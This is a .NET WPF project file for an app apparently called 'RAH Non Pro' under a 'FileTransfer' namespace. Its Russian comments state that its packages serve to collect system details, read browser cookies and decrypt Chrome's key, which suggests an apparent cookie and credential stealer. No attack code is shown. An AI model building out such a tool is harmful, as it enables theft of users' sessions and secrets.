<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <TargetFramework>net8.0-windows</TargetFramework>
    <Nullable>enable</Nullable>
    <ImplicitUsings>enable</ImplicitUsings>
    <UseWPF>true</UseWPF>
    <AssemblyName>RAH Non Pro</AssemblyName>
    <RootNamespace>FileTransfer</RootNamespace>
    <ApplicationManifest>app.manifest</ApplicationManifest>
    <ApplicationIcon>app.ico</ApplicationIcon>
    <PublishSingleFile>true</PublishSingleFile>
    <IncludeNativeLibrariesForSelfExtract>true</IncludeNativeLibrariesForSelfExtract>
    <EnableCompressionInSingleFile>true</EnableCompressionInSingleFile>
  </PropertyGroup>
  <ItemGroup>
    <None Include="app.ico" Pack="false" />
  </ItemGroup>
  <ItemGroup>
    <!-- WMI для получения характеристик компьютера -->
    <PackageReference Include="System.Management" Version="8.0.0" />
    <!-- SQLite для чтения кук браузеров -->
    <PackageReference Include="Microsoft.Data.Sqlite" Version="9.0.3" />
    <!-- DPAPI для расшифровки ключа Chrome -->
    <PackageReference Include="System.Security.Cryptography.ProtectedData" Version="8.0.0" />
  </ItemGroup>
</Project>
